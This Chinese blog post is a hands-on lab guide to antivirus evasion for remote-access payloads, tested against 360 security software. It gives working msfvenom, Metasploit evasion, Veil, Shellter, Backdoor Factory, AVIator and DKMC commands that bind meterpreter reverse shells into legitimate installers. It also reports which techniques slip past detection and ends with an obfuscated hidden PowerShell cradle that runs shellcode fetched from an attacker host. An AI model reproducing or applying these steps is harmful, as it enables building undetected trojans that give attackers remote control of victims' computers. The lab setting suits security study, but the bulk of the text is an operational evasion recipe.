    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2022-02-15 15:41:26" itemprop="dateCreated datePublished" datetime="2022-02-15T15:41:26+08:00">2022-02-15</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">Edited on</span>
        <time title="Modified: 2022-02-23 14:19:54" itemprop="dateModified" datetime="2022-02-23T14:19:54+08:00">2022-02-23</time>
      </span>

  
    <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">Views: </span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="远控免杀——工具篇"><a href="#远控免杀——工具篇" class="headerlink" title="远控免杀——工具篇"></a>远控免杀——工具篇</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>免杀对个人而言是一个熟悉又陌生的概念，之前只知道msf上进行简单的encode来免杀，现在还是从基本的工具开始学起</p>
<p>实验环境采用Kali+Win7虚拟机，测试机安装360全家桶</p>
<span id="more"></span>

<h2 id="msf自带免杀"><a href="#msf自带免杀" class="headerlink" title="msf自带免杀"></a>msf自带免杀</h2><h3 id="原始payload"><a href="#原始payload" class="headerlink" title="原始payload"></a>原始payload</h3><p>直接用msfvenom生成原始payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -f exe -o payload1.exe</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210193805172.png" alt="image-20220210193805172"></p>
<p>360静态动态均可查杀</p>
<h3 id="编码处理"><a href="#编码处理" class="headerlink" title="编码处理"></a>编码处理</h3><p>评级最⾼的两个encoder为<code>cmd/powershell_base64</code>和 <code>x86/shikata_ga_nai</code></p>
<p>编码次数为15并去掉空字符</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -e x86/shikata_ga_nai -b &quot;\x00&quot; -i 15 -f exe -o payload2.exe</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210201725861.png" alt="image-20220210201725861"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210201847245.png" alt="image-20220210201847245"></p>
<p>360静态动态均可查杀</p>
<h3 id="捆绑"><a href="#捆绑" class="headerlink" title="捆绑"></a>捆绑</h3><p>使用msfvenom中的<code>-x</code>参数可以指定一个可执行文件作为模板，将payload嵌入其中，<code>-x</code> 指定文件路径</p>
<p>我这里捆绑的是360安全卫士</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -x 360Safe.exe -f exe -o payload3.exe</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210202657179.png" alt="image-20220210202657179"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210202821265.png" alt="image-20220210202821265"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210202853855.png" alt="image-20220210202853855"></p>
<p>360安全卫士静态没扫出来，360杀毒静态查杀，动态均查杀</p>
<h3 id="捆绑-编码"><a href="#捆绑-编码" class="headerlink" title="捆绑+编码"></a>捆绑+编码</h3><p>上面两种方法的结合</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -e x86/shikata_ga_nai -x 360Safe.exe -i 15 -f exe -o payload4.exe</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210203326937.png" alt="image-20220210203326937"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210203539659.png" alt="image-20220210203539659"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210203553483.png" alt="image-20220210203553483"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210203627448.png" alt="image-20220210203627448"></p>
<p>360全家桶静态均可过，动态均查杀</p>
<h3 id="多重编码-捆绑"><a href="#多重编码-捆绑" class="headerlink" title="多重编码+捆绑"></a>多重编码+捆绑</h3><p>通过管道符，让msfvenom用不同的编码器反复进行编码混淆</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=192.168.221.128 LPORT=4444 -f raw | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 10 -x 360Safe.exe -f exe &gt; payload5.exe</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210205818844.png" alt="image-20220210205818844"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210205930063.png" alt="image-20220210205930063"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220210210357725.png" alt="image-20220210210357725"></p>
<p>360全家桶完全没反应？！</p>
<h3 id="Evasion模块"><a href="#Evasion模块" class="headerlink" title="Evasion模块"></a>Evasion模块</h3><p>metasploit 5.0引入的一个新模块</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211154339417.png" alt="image-20220211154339417"></p>
<h4 id="exe"><a href="#exe" class="headerlink" title="exe"></a>exe</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msf6 &gt; use evasion/windows/windows_defender_exe</span><br><span class="line">msf6 evasion(windows/windows_defender_exe) &gt; set filename payload6.exe</span><br><span class="line">msf6 evasion(windows/windows_defender_exe) &gt; set payload windows/meterpreter/reverse_tcp</span><br><span class="line">msf6 evasion(windows/windows_defender_exe) &gt; set lhost 192.168.221.128</span><br><span class="line">msf6 evasion(windows/windows_defender_exe) &gt; set lport 4444</span><br><span class="line">msf6 evasion(windows/windows_defender_exe) &gt; run</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211154547017.png" alt="image-20220211154547017"></p>
<p>监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">handler -H 192.168.221.128 -P 4444 -p windows/meterpreter/reverse_tcp</span><br><span class="line">jobs</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211154144937.png" alt="image-20220211154144937"></p>
<p>还没扫描就被删除了</p>
<h4 id="hta"><a href="#hta" class="headerlink" title="hta"></a>hta</h4><p>用<code>evasion/windows/windows_defender_js_hta</code>模块生成payload</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211155757515.png" alt="image-20220211155757515"></p>
<p>360杀毒静态可查杀</p>
<h4 id="install-util"><a href="#install-util" class="headerlink" title="install_util"></a>install_util</h4><p>用<code>evasion/windows/applocker_evasion_install_util</code>模块生成payload</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211171158049.png" alt="image-20220211171158049"></p>
<p>使用<code>csc.exe</code>进行编译后用<code>InstallUtil.exe</code>加载文件</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211170422141.png" alt="image-20220211170422141"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">InstallUtil.exe /logfile= /LogToConsole=false /U install_util.exe</span><br></pre></td></tr></table></figure>

<p>360动态可查杀</p>
<h3 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h3><p>MSF在被各大安全厂商盯这么紧的情况下，<code>多重编码＋捆绑</code>的方式能免杀成功还是出乎意料的</p>
<h2 id="Veil"><a href="#Veil" class="headerlink" title="Veil"></a>Veil</h2><h3 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h3><p>为了方便直接拉取veil镜像</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker pull mattiasohlsson/veil</span><br></pre></td></tr></table></figure>

<p>拉取成功，执行如下命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil</span><br></pre></td></tr></table></figure>

<p>将Kali的<code>/tmp/veil-output</code>目录映射到docker里面，这样Veil生成的payload可以直接在kali里使用</p>
<h3 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h3><p>Veil有两个免杀工具，Evasion和Ordnance</p>
<p>Evasion用做文件免杀</p>
<p>Ordnance生成在Veil-Evasion中使用的shellcode</p>
<h3 id="exe-1"><a href="#exe-1" class="headerlink" title="exe"></a>exe</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use 1                         //选择Evasionlist                          //查看payload列表use 16                        //go语言生成msf的payloadset lhost 192.168.221.128     set lport 4445generatego_msf                        //生成的payload名称</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211173556181.png" alt="image-20220211173556181"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211174519477.png" alt="image-20220211174519477"></p>
<p>360静态动态均可查杀</p>
<h3 id="Veil-mingw-w64"><a href="#Veil-mingw-w64" class="headerlink" title="Veil+mingw-w64"></a>Veil+mingw-w64</h3><p>（待补）</p>
<h2 id="Venom"><a href="#Venom" class="headerlink" title="Venom"></a>Venom</h2><p>（安装出问题，待补）</p>
<h2 id="Shellter"><a href="#Shellter" class="headerlink" title="Shellter"></a>Shellter</h2><h3 id="安装-1"><a href="#安装-1" class="headerlink" title="安装"></a>安装</h3><p>某些版本的Kali自带，没有的可以自行安装，安装过程中不会出现特别坑爹的问题，比较友好</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install shellter</span><br></pre></td></tr></table></figure>

<p>运行报错，有提示</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dpkg --add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</span><br></pre></td></tr></table></figure>

<p>安装完毕</p>
<h3 id="使用-1"><a href="#使用-1" class="headerlink" title="使用"></a>使用</h3><p>准备一个pe文件<code>npp.exe</code>，之后Shellter会备份该pe文件，因为生成的payload会覆盖原来的<code>npp.exe</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211210737098.png" alt="image-20220211210737098"></p>
<p>接下来根据情况来选择即可，我选的<code>windows/meterpreter/reverse_tcp</code></p>
<p>中间有个<code>Enable Stealth Mode</code>，是否使用隐身模式，特意做了两种来尝试</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211195832317.png" alt="image-20220211195832317"></p>
<p>选择隐身模式生成的payload执行后被查杀</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211210316878.png" alt="image-20220211210316878"></p>
<p>选择非隐身模式生成的payload，成功绕过360！</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220211211221212.png" alt="image-20220211211221212"></p>
<h3 id="小结-1"><a href="#小结-1" class="headerlink" title="小结"></a>小结</h3><p>Shellter使用方便，免杀效果不错。第一次用<code>360Safe.exe</code>生成的payload一直没法监听成功也没有被查杀。搜索了下得用32位的，改用老版本<code>notepad++</code>的安装程序，成功收到meterpreter，对于为啥选择非隐身能绕过360还是不太懂</p>
<h2 id="BackDoor-Factory"><a href="#BackDoor-Factory" class="headerlink" title="BackDoor-Factory"></a>BackDoor-Factory</h2><p>用户可以在不破坏原有可执行文件的功能的前提下，在文件的代码裂隙中插入shellcode，支持自定义shellcode</p>
<h3 id="安装-2"><a href="#安装-2" class="headerlink" title="安装"></a>安装</h3><p>直接拉取docker镜像</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">docker pull secretsquirrel/the-backdoor-factory</span><br><span class="line">docker run -it secretsquirrel/the-backdoor-factory bash</span><br><span class="line"># ./backdoor.py</span><br></pre></td></tr></table></figure>

<p>运行成功</p>
<h3 id="使用-2"><a href="#使用-2" class="headerlink" title="使用"></a>使用</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -it -v /root/test:/root/payload:z secretsquirrel/the-backdoor-factory</span><br></pre></td></tr></table></figure>

<p>跟Veil使用相似，进行文件夹映射</p>
<h4 id="程序测试"><a href="#程序测试" class="headerlink" title="程序测试"></a>程序测试</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python backdoor.py -f /root/payload/360Safe.exe -S</span><br></pre></td></tr></table></figure>

<blockquote>
<p>-f: 指定被测试程序</p>
<p>-S: 检查程序是否可被利用</p>
</blockquote>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212125645235.png" alt="image-20220212125645235"></p>
<p>检查exe是否能插入shellcode</p>
<h4 id="搜索Code-Caves"><a href="#搜索Code-Caves" class="headerlink" title="搜索Code Caves"></a>搜索Code Caves</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python backdoor.py -f /root/payload/360Safe.exe -c -l 600</span><br></pre></td></tr></table></figure>

<blockquote>
<p>-c: 查找Code Cave</p>
<p>-l: Code Cave Size，用于插入shellcode</p>
</blockquote>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212130536451.png" alt="image-20220212130536451"></p>
<p>找到了5个可利用点</p>
<h4 id="获取payload"><a href="#获取payload" class="headerlink" title="获取payload"></a>获取payload</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python backdoor.py -f /root/payload/360Safe.exe -s -show</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212130803057.png" alt="image-20220212130803057"></p>
<blockquote>
<ol>
<li>reverse_shell_tcp_inline ：对应msf： use exploit/multi/handlerset</li>
</ol>
<p>payload windows/meterpreter/reverse_tcp</p>
<ol start="2">
<li>meterpreter_reverse_https_threaded ：对应msf： use</li>
</ol>
<p>exploit/multi/handlerset payload windows/meterpreter/reverse_https</p>
<ol start="3">
<li>iat_reverse_tcp_inline : 增加了修复IAT的功能，避免reverse_shell_tcp_inline执⾏失败</li>
<li>iat_reverse_tcp_stager_threaded : 功能类似上一条</li>
<li>user_supplied_shellcode_threaded ：对应的msf： use</li>
</ol>
<p>exploit/multi/handlerset payload windows/meterpreter/reverse_tcp``⾃定义</p>
<p>shellcode</p>
</blockquote>
<h4 id="生成payload"><a href="#生成payload" class="headerlink" title="生成payload"></a>生成payload</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python backdoor.py -f /root/payload/360Safe.exe -s iat_reverse_tcp_stager_threaded -H 192.168.221.128 -P 4444 -J -o payload8.exe</span><br></pre></td></tr></table></figure>

<blockquote>
<p>-J: 选择多个Code Cave注入 </p>
</blockquote>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212140152504.png" alt="image-20220212140152504"></p>
<p>360动静态均可查杀</p>
<h3 id="小结-2"><a href="#小结-2" class="headerlink" title="小结"></a>小结</h3><p>缝隙插入代码的想法比较有意思，但是免杀效果经测试不太行</p>
<h2 id="Avet"><a href="#Avet" class="headerlink" title="Avet"></a>Avet</h2><p>（装了近3个小时没法用，心态崩了）</p>
<h2 id="TheFatRat"><a href="#TheFatRat" class="headerlink" title="TheFatRat"></a>TheFatRat</h2><p>（待补）</p>
<h2 id="Avoidz"><a href="#Avoidz" class="headerlink" title="Avoidz"></a>Avoidz</h2><p>（安装出错，待补）</p>
<h2 id="Green-Hat-Suite"><a href="#Green-Hat-Suite" class="headerlink" title="Green-Hat-Suite"></a>Green-Hat-Suite</h2><p>（待补）</p>
<h2 id="zirikatu"><a href="#zirikatu" class="headerlink" title="zirikatu"></a>zirikatu</h2><p>zirikatu利用msfvenom生成shellcode，再进行后续处理并生成exe</p>
<h3 id="安装-3"><a href="#安装-3" class="headerlink" title="安装"></a>安装</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">chmod +x zirikatu.sh</span><br><span class="line">./zirikatu.sh</span><br></pre></td></tr></table></figure>

<p>运行成功</p>
<h3 id="使用-3"><a href="#使用-3" class="headerlink" title="使用"></a>使用</h3><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212180240192.png" alt="image-20220212180240192"></p>
<p>zirikatu可以修改图标，增加错误提示，监听等功能</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212180215659.png" alt="image-20220212180215659"></p>
<p>360静态可查杀</p>
<h3 id="小结-3"><a href="#小结-3" class="headerlink" title="小结"></a>小结</h3><p>网上看到的文章中这个操作简单体量小的工具居然能免杀360火绒，测试后静态查杀就翻车了，这个工具也挺老了后续没有更新，可惜</p>
<h2 id="AVIator"><a href="#AVIator" class="headerlink" title="AVIator"></a>AVIator</h2><p>AVIator使⽤AES加密来加密给定的Shellcode加密，⽣成⼀个包含加密有效负载的可</p>
<p>执⾏⽂件，然后使⽤各种注⼊技术将shellcode解密并注⼊到⽬标系统，从⽽绕过杀</p>
<p>毒软件的检测</p>
<p>只支持windows，C#开发</p>
<h3 id="安装-4"><a href="#安装-4" class="headerlink" title="安装"></a>安装</h3><p>直接下载压缩包</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://github.com/Ch0pin/AVIator</span><br></pre></td></tr></table></figure>

<p>解压运行exe即可</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212181426434.png" alt="image-20220212181426434"></p>
<h3 id="使用-4"><a href="#使用-4" class="headerlink" title="使用"></a>使用</h3><p>用msf生成基于C#的shellcode</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.221.128 LPORT=4444 -f csharp -o payload11.c</span><br></pre></td></tr></table></figure>

<p>复制<code>payload11.c</code>中{}内的内容到payload，加密生成新payload</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212182138145.png" alt="image-20220212182138145"></p>
<p><code>Select path</code>选择存放路径</p>
<p><code>Injection Techniques</code>选择注入技术，这里用了第二个注入Notepad++</p>
<p><code>Generate Exe</code>生成可执行文件</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212183258116.png" alt="image-20220212183258116"></p>
<p>360全家桶第一次静态查杀没有反应，但是过了一会就被360杀毒删除隔离了</p>
<p>动态直接被查杀</p>
<h3 id="小结-4"><a href="#小结-4" class="headerlink" title="小结"></a>小结</h3><p>工具简单，使用便捷。免杀效果不如以前了，作者官方说明文件中也说了，随着工具的流行，工具也长期没有更新，效果确实越来越差了。但是作者提出了一种思路，就是对生成的可执行文件使用C#混淆器，后续可以尝试下</p>
<h2 id="DKMC"><a href="#DKMC" class="headerlink" title="DKMC"></a>DKMC</h2><p>DKMC是⼀种⽣成混淆的shellcode的⼯具，并把shellcode合成到图像⽂件中，最终依靠PowerShell执⾏最终的shellcode</p>
<h3 id="安装-5"><a href="#安装-5" class="headerlink" title="安装"></a>安装</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/Mr-Un1k0d3r/DKMC</span><br></pre></td></tr></table></figure>

<h3 id="使用-5"><a href="#使用-5" class="headerlink" title="使用"></a>使用</h3><p><code>python dkmc.py</code>运行DKMC，参数解释</p>
<blockquote>
<p>[*] (gen) 将msf的shellcode注入到一个BMP图像</p>
<p>[*] (web) 启动web服务用来分发BMP图像</p>
<p>[*] (ps) 生成ps的payload</p>
<p>[*] (sc) 将msf生成的raw文件转为shellcode</p>
<p>[*] (exit) 退出</p>
</blockquote>
<p>执行流程如下：</p>
<ol>
<li>用msf生成raw文件</li>
<li>将msf生成的raw文件转为shellcode</li>
<li>将shellcode注入到BMP图像中</li>
<li>生成powershell payload</li>
<li>用web服务分发BMP文件</li>
</ol>
<h4 id="第一步"><a href="#第一步" class="headerlink" title="第一步"></a>第一步</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.221.128 LPORT=4444 -e x86/shikata_ga_nai -b &quot;\x00&quot; -i 5 -a x86 -f raw -o /root/桌面/payload/payload12.raw</span><br></pre></td></tr></table></figure>

<h4 id="第二步"><a href="#第二步" class="headerlink" title="第二步"></a>第二步</h4><p><code>sc</code>设置``source为上一步生成的<code>payload12.raw</code>，生成shellcode，复制并<code>exit</code>返回主菜单</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212202336610.png" alt="image-20220212202336610"></p>
<h4 id="第三步"><a href="#第三步" class="headerlink" title="第三步"></a>第三步</h4><p><code>gen</code>设置shellcode为上一步中复制的内容，生成bmp并<code>exit</code>返回主菜单</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212202635077.png" alt="image-20220212202635077"></p>
<h4 id="第四步"><a href="#第四步" class="headerlink" title="第四步"></a>第四步</h4><p><code>ps</code>设置url为Kali地址，执行生成powershell脚本，复制脚本并<code>exit</code>返回主菜单</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212203218057.png" alt="image-20220212203218057"></p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell.exe <span class="literal">-nop</span> <span class="literal">-w</span> <span class="keyword">hidden</span> <span class="literal">-enc</span> JABIAGEAcABiAEwAUgB0AFQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEcAdQBvAEIAMgBJAEMALwB6AEUAMgBOAEQAUQAyAE4AagBrAHcATQB6AFUAdQBNAHoAWQAhAHYAVgBaAGQAVAArAE0ANABGAEgAMQBIADQAagA5AFkAbwAwAGgASgBwAEQAUwAwAEIAYgBFAHMAMABrAGkAVQBGAG8AYQBPAEsASABRAEkAUQA5AEYAMABxAHAARwBiADMARABZAGUAbgBEAGcANABUAHEARQBNAC8AUABlADkAegBnAGMAcABvAHUAeQB3AHUAOQBMAG0ASgBZAGwAOQByADMAMQA5AHoAdgBHAHgAagBTAC8AegBIAHIAMABtAEgAOABtAEIAdQBiAGsAeAB5ADIASgBmAE0AUgBHAFQAVwArADkAYQBmAGcAdABaAGQARQBwACsAYgBXADYAUQA4AGgAbABTAFMAUwBOAGkARwBRAHMAcQBmADAAUQBpAHkARABnADQASgBQADkASgBwAFAAIQBoAHkAQwBUAFkAZABiACEAeABEAFUALwBTADYAeABnAEgAdABzAGEAZABKAE8AbQBKAGkATABKADQAcwByAC8AZgB6AGEAUwBFAFcAQgBYAC8ANwBpAGQAUQBuAFQAUwBGAGEATQBvAFoAcABKAFoATgBIAHMAawBvAEIAIQBtAE4AOAArAGwAUAA4AEIAWAA1AFIAWQB3AGYANwBpAGMAdQBwAHAAUwBYAFkAYwBzAHUAOQBVAE0AZwBqAFUANABjADYATAA1AFQANABWAE4AZABzAE8AcwBsAG4AQwBuAEwALwBQADcAZAB0AE0AZQBOADEAcwBRADkAdQBzADAAbwBUAHkAMwBUAFcANgBZAEsASQBqAGYAZwAzAEwAVABKAGsANgAwAG4AdgBGAHcAbQBZAEoAawBEADUAawB1AFIAaQBwAGwAeQBSAHkAegBlAGIAcgB0AGYANAA1AFQATwA0ACEAeABIAFcAOAAhACEAVgBDAGkAQwAxAE0AVABsADEAIQB1AFMAbwBEAEkAWgBWACsAdgBTACEAeABWAGgAbABvAG0AZgBRADAAUwBnAEUAdwBRAFMAVQBzAHgAeQArAC8ARgBDADMASQBCAGwAeABCAG4AbgBEAGoAbQB3AHgAbQBVAFYARgAxAG0AcwBXACEAVABZAHIAMABDAEsAeAAhAE8ANQBZAEQANgBrADcAZwBtAE4AIQB3ADQAWABNAEoAdABZAFoAMwBCAFgATABmADYAOQBTAGQAWgBxAEUAawBZAE4AbABiAFEAZABwAEcAbAB0AG8AWQBPAGMAdAB5AEwAWAB0AEYAKwBYAHUAawBLAHUAagBjADgAcgBnAGgARwBTAEoANAAzAEsAcwAxAEwARQBSAFQAYQBhAHIAVgBGAEoAMwBWACEAOQA0ADcAdwBIAGMAQgBYAFcAVQBLAFEAcwB6AC8ANQBJAG0AZwA0AFoAWQBEAFYAVQBDAGIAbgBFAFgAKwBOAFMAWgBtAEIAUAB5AEYAaQB6AE4ASgA1AE0AaQBEAEcANgBTAHYAeABoADcAMwB3ADUAYwB0ADQANwBaAEsAdgBLAHgAKwB4AFkAZgAhAG0AeABhAFgAdwBsAFcARABDAHAAQgAzAGoAQgByAEsARQBZADEAegBGAHYAeQA3AFEASABNAHgAWgBEAGIAeABuAFQAaQBQAG0AVgBFAHEAMQAxAFoATQBHAE0AUQB3ADYATQBXADQAVwBkAFkAWQBHAFcAVwBYAFoAIQAwACEATQBPAGMANgBvADAAKwAhADQAWgB2ADAANAA3AGkAcABoADYAegBqADMATQBHACEAOQAhAGQAbgB3AGsAUABNAFcAcQBVACEAdgAyAHkAMgBJAEsAUABpADIAegBIAHcAOABnAFEAZwBpAEwAZgB4AE4ANQBtADYASAArAG8AWQBvAHUATgBiACsAcwBaAHQAZgAvAEcARwBSADIATwBVADEAVABoAHcAdwB6ADMASQBDACsAUQB6AHkAZwBIACEASwBIAGQATwBLAFUAbABWADIAZABUAEkAbgA4ADAANgB6AEwASABXAFIAYwBNAFoAKwBtAHEAaABwAHUAWQByADkARQBzADUAeQAxAEsAKwBKAFUAeQBjAHgASABiAGgARwBCAFMAeQA4AEIAbgAxAEcAdQAhAFgASABJAEMAUQB2AGcAYwBPAG0AeABlAFQAVwA3AHUAUgBhAE8ATAB1AFcAYwB4AFgATQBjAGEAWQBGADAAWQBJAHUARwB3AFYATgBhAE0AUgBJAEwAcgBkAFYAaAB1AHgANgBvAGYAcABSAHcAaQBEACEAdwBOADQAVgBqAFQAdQBkAG8AIQBlAFUARwB5AG4AVgBHADUAeABDAFkANgA0AHUAdABOAGsAbQB4AEkAegBRADQARgBTAG8AcgBwAFMATABqAEgAaABmAEsASQBWAGQATQBLAG4AUQBZAEQAYgBTAFcAMgBIACsAdgBwAEwASQBYAFgAVgBCAFgAUQBzAG0AUgBWAGUAeQAzAEMAcABnAHoAUQBMAHUAQwA2AFEAWABjAFoAcAAhAHEAUgAhAEoATABwADAAZwBHAHQAcQBFAEQAMwBTADkAMQBaAHEAQgB4AFEAdQA2ADEAbwBsAGYAUwA2AHAANwBjAFEAZQB2AGMAbABSAFMAYwA2AEgAQwBwADkATABZAHoAVAByADMAdwArAHUANwB6AHcANAAzADIANwA5AGMAeQBMACsAdgBvAG8AbQB2AEgAQwBqAFUAbQA3AG0ASQB1AGEATgBDAGoAaQBsAG8AZgBRAHEAVwBTAC8AYQAyAHQAMQBwADkAdAB0ADcAVwA3ADUANwBiAGIATABiAGYAVgAzAHQAcwBTAG0AVQBvAHkAMQBXAGoAdAA3AHUAegBzADcAdQA3ADkAcwBkADEAMABwADEASAB5AEkAZAArAEkAQgB2AFYAdgB3AHAA